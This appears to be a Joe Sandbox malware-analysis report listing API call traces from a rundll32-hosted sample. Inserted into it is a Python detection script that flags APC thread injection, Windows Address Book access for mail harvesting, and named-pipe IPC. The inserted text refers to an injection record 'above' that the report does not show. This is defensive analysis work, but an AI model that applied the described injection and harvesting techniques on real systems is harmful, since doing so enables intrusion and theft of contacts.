                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 1408595562-0
                                                          • Opcode ID: 5eb522b97bbf5f5d174b71f50972b2e367d2df94946af7a06598823f64b39a70
                                                          • Instruction ID: 0f198351ccf604fcac2a4d0fee19e6ceb794492a998964375950ce059252ef2f
                                                          • Opcode Fuzzy Hash: 5eb522b97bbf5f5d174b71f50972b2e367d2df94946af7a06598823f64b39a70
                                                          • Instruction Fuzzy Hash: 3E118F71620716DFCB616F65ED48D5AB7A9BF447463000D18EA82A2490DB71E440CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,06273DA2,00000000,00000001,?,?,?), ref: 0627DD92
                                                          • lstrlen.KERNEL32(?), ref: 0627DDA2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627DDD6
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0627DE01
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0627DE20
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627DE81
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0627DEA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                          • String ID: W
                                                          • API String ID: 3204852930-655174618
                                                          • Opcode ID: 90d7a6df6978853b77f158f2010c2f9637da5fa692ce1c547b34f2f4740480c3
                                                          • Instruction ID: fd9b9e1a9c6db93624eb10fc3c6be3a9f25498702ce1b4bcd7c736f83285e732
                                                          • Opcode Fuzzy Hash: 90d7a6df6978853b77f158f2010c2f9637da5fa692ce1c547b34f2f4740480c3
                                                          • Instruction Fuzzy Hash: 7941287191020EEFDF528F55DC84EAEBBB9FF54244F144829ED14A7210E7319A54DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0627D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000), ref: 0627D435
                                                            • Part of subcall function 0627D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?), ref: 0627D493
                                                            • Part of subcall function 0627D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4A3
                                                          • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0627A153
                                                          • wsprintfA.USER32 ref: 0627A181
                                                          • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0627A1DF
                                                          • GetLastError.KERNEL32 ref: 0627A1F6
                                                          • ResetEvent.KERNEL32(?), ref: 0627A20A
                                                          • ResetEvent.KERNEL32(?), ref: 0627A20F
                                                          • GetLastError.KERNEL32 ref: 0627A227
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                                          • String ID: `
                                                          • API String ID: 2276693960-1850852036
                                                          • Opcode ID: 9bec6965f57b4d8a58c4b32cec8d7b2b4fd7b36e757058d586ee29cfc4d4f5f1
                                                          • Instruction ID: 0c3d998732c75001712833c0d64e5707f76545264fc3cd45b252e831a8e68eb7
                                                          • Opcode Fuzzy Hash: 9bec6965f57b4d8a58c4b32cec8d7b2b4fd7b36e757058d586ee29cfc4d4f5f1
                                                          • Instruction Fuzzy Hash: 1741597192020AAFDF51EFA6EC88F9E7BB9FF48324F100419E911A2150D7319A54DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(062743C6,00000000,?,?,?,?,062743C6,00000035,00000000,?,00000000), ref: 062731A2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062731B8
                                                          • memcpy.NTDLL(00000010,062743C6,00000000,?,?,062743C6,00000035,00000000), ref: 062731EE
                                                          • memcpy.NTDLL(00000010,00000000,00000035,?,?,062743C6,00000035), ref: 06273209
                                                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 06273227
                                                          • GetLastError.KERNEL32(?,?,062743C6,00000035), ref: 06273231
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,062743C6,00000035), ref: 06273254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                          • String ID: (
                                                          • API String ID: 2237239663-3887548279
                                                          • Opcode ID: 2667112a87208e697eb9a544d988c039f7abc41e4310e40fd76c3205fb0b3b80
                                                          • Instruction ID: c1d6d1ae3de67b0a8a1a558686545fc1a226a65367e0f582c8aeeccda1ab55d0
                                                          • Opcode Fuzzy Hash: 2667112a87208e697eb9a544d988c039f7abc41e4310e40fd76c3205fb0b3b80
                                                          • Instruction Fuzzy Hash: 05318236A1030AEFDB61CF95EC45E9B7BB9FF84754F044425FE45E2210D2309955DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0627EC1B
                                                          • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0627ECD3
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627EC69
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0627EC82
                                                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0627ECA1
                                                          • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627ECB3
                                                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0627ECBB
                                                          Strings
                                                          • Software\Microsoft\WAB\DLLPath, xrefs: 0627EC0C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                          • String ID: Software\Microsoft\WAB\DLLPath
                                                          • API String ID: 1628847533-3156921957
                                                          • Opcode ID: 6754ead00346d7d1b8095de9d2d91ff1c68129f32fca5cc2d46612dd7cc9948a
                                                          • Instruction ID: a592176479eeffe80b4d4fe787a918c211cfc7d383edb1d13f82de47d4aa3812
                                                          • Opcode Fuzzy Hash: 6754ead00346d7d1b8095de9d2d91ff1c68129f32fca5cc2d46612dd7cc9948a
                                                          • Instruction Fuzzy Hash: A321E775D10215FFDB51AB69EC48C9EBF79EB84211B1501A9FD41A3160D2714E40CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
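The two "APIs" records above (the thread-enumeration routine at 0627EE2A.. and the registry lookup at 0627EC1B..) are the kind of call sequence an analyst wants to pull out of this report automatically: the first one snapshots threads (CreateToolhelp32Snapshot with 0x4 = TH32CS_SNAPTHREAD), opens each one with 0x1F03FF = THREAD_ALL_ACCESS and queues an APC to it, which is the APC-injection loop behind the "Creates a thread in another existing process" signature; the second reads HKLM (0x80000002) Software\Microsoft\WAB\DLLPath to find wab32.dll, loads it and resolves an export, which is how the Windows Address Book is opened for the mail-harvesting behaviour. The script below is an added example, not part of the Joe Sandbox output or of the sample: it parses the report's "APIs" record format into structured calls and flags those two sequences (plus the CallNamedPipeA IPC seen in the 062731A2.. record). The sample text is copied from the records on this page; the pattern names, the subsequence-matching rule and the constants are my own assumptions, not Joe Sandbox signatures.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed sample input: two "APIs" records copied from this report.
SAMPLE_RECORDS = r"""
APIs
• CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0627EE2A
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0627EE36
• GetModuleHandleA.KERNEL32(?,0689978E,00000000,?,00000000), ref: 0627EE56
• GetProcAddress.KERNEL32(00000000), ref: 0627EE5D
• Thread32First.KERNEL32(?,0000001C), ref: 0627EE6D
• OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0627EE88
• QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0627EE99
• CloseHandle.KERNEL32(00000000), ref: 0627EEA0
• Thread32Next.KERNEL32(?,0000001C), ref: 0627EEA9
• CloseHandle.KERNEL32(?), ref: 0627EEB5
Memory Dump Source
APIs
• RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0627EC1B
• RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0627ECD3
  • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
• LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627EC69
• GetProcAddress.KERNEL32(00000000,?), ref: 0627EC82
• GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0627ECA1
• FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627ECB3
• GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0627ECBB
Strings
"""

TH32CS_SNAPTHREAD = 0x00000004   # CreateToolhelp32Snapshot flag: thread list
THREAD_ALL_ACCESS = 0x001F03FF   # OpenThread desired access (Vista and later)


class ApiCall(NamedTuple):
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: bool  # True for "Part of subcall function ..." lines


# One report line: optional bullet, optional subcall prefix, Name.MODULE(args), ref: ADDR
_CALL_RE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_records(text: str) -> List[List[ApiCall]]:
    """Split the report text into records, one per 'APIs' heading."""
    records: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if stripped in ("Memory Dump Source", "Strings"):
            current = None          # record ended
            continue
        if current is None:
            continue
        m = _CALL_RE.match(line)
        if not m:
            continue                # not a call line
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        current.append(ApiCall(m.group("name"), m.group("module"), args,
                               m.group("ref").upper(), bool(m.group("sub"))))
    return records


def _in_order(names: List[str], wanted: List[str]) -> bool:
    """True if every name in `wanted` occurs in `names`, in that order (gaps allowed)."""
    it = iter(names)
    return all(any(n == w for n in it) for w in wanted)


def _first_arg_int(call: ApiCall) -> Optional[int]:
    if call.args and re.fullmatch(r"-?[0-9A-Fa-f]{8}", call.args[0]):
        return int(call.args[0], 16)
    return None


def classify(record: List[ApiCall]) -> List[str]:
    """Assumed pattern rules; only direct calls count, subcall lines are ignored."""
    direct = [c for c in record if not c.subcall]
    names = [c.name for c in direct]
    by_name = {c.name: c for c in direct}
    findings: List[str] = []

    # Thread snapshot -> OpenThread -> QueueUserAPC inside a Thread32Next loop.
    if _in_order(names, ["CreateToolhelp32Snapshot", "Thread32First",
                         "OpenThread", "QueueUserAPC", "Thread32Next"]):
        detail = "thread snapshot with an APC queued to every thread"
        if (_first_arg_int(by_name["CreateToolhelp32Snapshot"]) == TH32CS_SNAPTHREAD
                and _first_arg_int(by_name["OpenThread"]) == THREAD_ALL_ACCESS):
            detail += " (TH32CS_SNAPTHREAD, THREAD_ALL_ACCESS)"
        findings.append("apc_injection_loop: " + detail)

    # WAB DLLPath lookup followed by LoadLibrary/GetProcAddress on that path.
    reg = next((c for c in direct if c.name.startswith("RegOpenKey")
                and any("WAB\\DLLPath" in a for a in c.args)), None)
    if reg is not None and _in_order(names, ["LoadLibraryA", "GetProcAddress"]):
        hive = "HKLM" if _first_arg_int(reg) == 0x80000002 else "unknown hive"
        findings.append(f"wab_address_book_access: wab32.dll located via {hive} "
                        "Software\\Microsoft\\WAB\\DLLPath and an export resolved")

    if "CallNamedPipeA" in names:
        findings.append("named_pipe_ipc: CallNamedPipeA request/response to a named pipe")
    return findings


def scan(text: str) -> Dict[str, List[str]]:
    """Map each record (keyed by its first call's ref address) to its findings."""
    return {rec[0].ref: classify(rec) for rec in parse_records(text) if rec}


if __name__ == "__main__":
    for ref, hits in scan(SAMPLE_RECORDS).items():
        print(ref, hits or ["no pattern"])
```

Run it over a saved copy of the report's function listing instead of SAMPLE_RECORDS to get every record tagged; records that contain only heap/string helpers come back empty, which is the expected result for most of the listing.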

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 06287777
                                                          • memset.NTDLL ref: 0628778B
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • GetCurrentThreadId.KERNEL32 ref: 06287818
                                                          • GetCurrentThread.KERNEL32 ref: 0628782B
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 062878D2
                                                          • Sleep.KERNEL32(0000000A), ref: 062878DC
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06287902
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06287930
                                                          • HeapFree.KERNEL32(00000000,00000018), ref: 06287943
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                          • String ID:
                                                          • API String ID: 1146182784-0
                                                          • Opcode ID: 177bc148551a0a005de7777e1cf3aabc3d7ba9b35162bbb083950832000a1aab
                                                          • Instruction ID: 140b7c2f374689c294719d3a3324be7cec35f92b5d04ff1b7b37a8a46712f24d
                                                          • Opcode Fuzzy Hash: 177bc148551a0a005de7777e1cf3aabc3d7ba9b35162bbb083950832000a1aab
                                                          • Instruction Fuzzy Hash: 805138B1915342AFD791EF64EC8481ABBE9FB88244F104C2DFA95D7250D334DA48DFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062870C3: RtlEnterCriticalSection.NTDLL(0629A428), ref: 062870CB
                                                            • Part of subcall function 062870C3: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062870E0
                                                            • Part of subcall function 062870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 062870F9
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0628284F
                                                          • memset.NTDLL ref: 06282860
                                                          • lstrcmpi.KERNEL32(?,?), ref: 062828A0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 062828CC
                                                          • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,06288974), ref: 062828E0
                                                          • memset.NTDLL ref: 062828ED
                                                          • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 06282906
                                                          • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 06282929
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,06288974), ref: 06282946
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 694413484-0
                                                          • Opcode ID: ef137c23937141551ed4133b85c8d68ecfe983b618dd8b40a2fccbf2496b0bb1
                                                          • Instruction ID: 07de83c3e5bf21713efac1e1f62300d520069a81f997e2edea2a697ae52d7084
                                                          • Opcode Fuzzy Hash: ef137c23937141551ed4133b85c8d68ecfe983b618dd8b40a2fccbf2496b0bb1
                                                          • Instruction Fuzzy Hash: D941C471E1131AEFDF50AFA4DC88B9D7BB9EF48314F148429E914A7290D7359A44CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628C9CC
                                                          • lstrlen.KERNEL32(?), ref: 0628C9D4
                                                          • lstrlen.KERNEL32(?), ref: 0628CA3F
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628CA6A
                                                          • memcpy.NTDLL(00000000,00000002,?), ref: 0628CA7B
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0628CA91
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0628CAA3
                                                          • memcpy.NTDLL(00000000,062953E8,00000002,00000000,?,?,00000000,?,?), ref: 0628CAB6
                                                          • memcpy.NTDLL(00000000,?,00000002), ref: 0628CACB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$lstrlen$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3386453358-0
                                                          • Opcode ID: b471072004dc39e2e68417f9ed7f42f2eb78479d6ff081fb91ffe6b9c58ad938
                                                          • Instruction ID: 5c3a763a6d112311c02340ed4542952908b301ed27ee85b424e38667b63af339
                                                          • Opcode Fuzzy Hash: b471072004dc39e2e68417f9ed7f42f2eb78479d6ff081fb91ffe6b9c58ad938
                                                          • Instruction Fuzzy Hash: 2E416D72E1020AEFCF41DFA8DC84A9EBBB9EF48214F144456ED15A3241E771EA50CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062870C3: RtlEnterCriticalSection.NTDLL(0629A428), ref: 062870CB
                                                            • Part of subcall function 062870C3: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062870E0
                                                            • Part of subcall function 062870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 062870F9
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062760AC
                                                          • lstrlen.KERNEL32(00000008,?,?,?,0628F140,00000000,00000000,-00000008), ref: 062760BB
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 062760CD
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,0628F140,00000000,00000000,-00000008), ref: 062760DD
                                                          • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0628F140,00000000,00000000,-00000008), ref: 062760EF
                                                          • lstrcpy.KERNEL32(00000020), ref: 06276121
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0627612D
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 06276185
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3746371830-0
                                                          • Opcode ID: dd985c4a9a4742bbdf2d02709a4fe656952d21c4d8a4e0b2b93507ffaaa47456
                                                          • Instruction ID: 71ef622cb0d2acf245dfda7acaaeb756b942b1f868d87f43a1ac38dfe3fe64f8
                                                          • Opcode Fuzzy Hash: dd985c4a9a4742bbdf2d02709a4fe656952d21c4d8a4e0b2b93507ffaaa47456
                                                          • Instruction Fuzzy Hash: 26418B71920B06EFDB618F54E848B5ABBFAFF88314F108419ED0993201DB71E954CFA0
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                            • Part of subcall function 06285119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0628514B
                                                            • Part of subcall function 06285119: HeapFree.KERNEL32(00000000,00000000,?,?,0628FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 06285170
                                                            • Part of subcall function 062879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0628FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 062879DC
                                                            • Part of subcall function 062879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0628FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 06287A2F
                                                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628FC63
                                                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628FC6B
                                                          • lstrlen.KERNEL32(?), ref: 0628FC75
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628FC8A
                                                          • wsprintfA.USER32 ref: 0628FCC6
                                                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0628FCE5
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628FCFA
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628FD07
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628FD15
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                          • String ID:
                                                          • API String ID: 168057987-0
                                                          • Opcode ID: 8e43b86c645f0101c39e01ce9d91d493a93afd3a050934b931e27c3111c68a71
                                                          • Instruction ID: 8a3200e037fb2e267f17c0dab4975badff3ac70684e5f307b6834df426ab0186
                                                          • Opcode Fuzzy Hash: 8e43b86c645f0101c39e01ce9d91d493a93afd3a050934b931e27c3111c68a71
                                                          • Instruction Fuzzy Hash: C631E031A11315AFC751BF65EC49E5BBBE9EF88310F00082AFE54E6191D7708818DFA2
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                          • GetLastError.KERNEL32 ref: 0627F3E5
                                                          • WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                          • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                          • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                          • SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                          • GetLastError.KERNEL32 ref: 0627F483
                                                          • CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                          • String ID:
                                                          • API String ID: 2864405449-0
                                                          • Opcode ID: 8a86aec5e537abd2daa72df11c5693891898421842ea5425fa324fd47a4eda6c
                                                          • Instruction ID: e2e5aea48e58c8ae7c30c7918515894aee7c6be06cd1d25914add5a740cef60f
                                                          • Opcode Fuzzy Hash: 8a86aec5e537abd2daa72df11c5693891898421842ea5425fa324fd47a4eda6c
                                                          • Instruction Fuzzy Hash: 64318C31A10209BFEB118FA9EE0DFAE7B79EF44328F204110FA10A2090C3704A54DFA1
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,06275674,00000008,?,00000010,00000001,00000000,0000003A), ref: 062906AC
                                                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 062906E0
                                                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 062906E8
                                                          • GetLastError.KERNEL32 ref: 062906F2
                                                          • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0629070E
                                                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 06290727
                                                          • CancelIo.KERNEL32(?), ref: 0629073C
                                                          • CloseHandle.KERNEL32(?), ref: 0629074C
                                                          • GetLastError.KERNEL32 ref: 06290754
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                          • String ID:
                                                          • API String ID: 4263211335-0
                                                          • Opcode ID: 42e942aa930ba18a1fee592c7b997760657a1199cb5cd095b2630c1a1ccd4df9
                                                          • Instruction ID: a697d18466c773a342a6cd08c52625c71926c1115f5a2ba25d467d41c07b2b37
                                                          • Opcode Fuzzy Hash: 42e942aa930ba18a1fee592c7b997760657a1199cb5cd095b2630c1a1ccd4df9
                                                          • Instruction Fuzzy Hash: FD212E75A10219BFDF429F65E8489EE7B7AEF88320B008016FA09E6140D7708555CFB1
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06281C25
                                                          • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 06281C3B
                                                          • _snwprintf.NTDLL ref: 06281C60
                                                          • CreateFileMappingW.KERNEL32(000000FF,0629A1E8,00000004,00000000,00001000,?), ref: 06281C7C
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 06281C8E
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 06281CA5
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 06281CC6
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 06281CCE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: b7f8e2fdcf7ce962773b4a22432f4c7579949f61054897fb3b85ee08f7b1a503
                                                          • Instruction ID: 8a22d664b8698cbf6e35a0a5fc4e2fcd8ebe7f1945b4fee3c47ed5a6d72be5d2
                                                          • Opcode Fuzzy Hash: b7f8e2fdcf7ce962773b4a22432f4c7579949f61054897fb3b85ee08f7b1a503
                                                          • Instruction Fuzzy Hash: 0121C372B51305BFD761AB54EC09F9A77A9AB88750F200121FA05F72C1D6709516CBB1
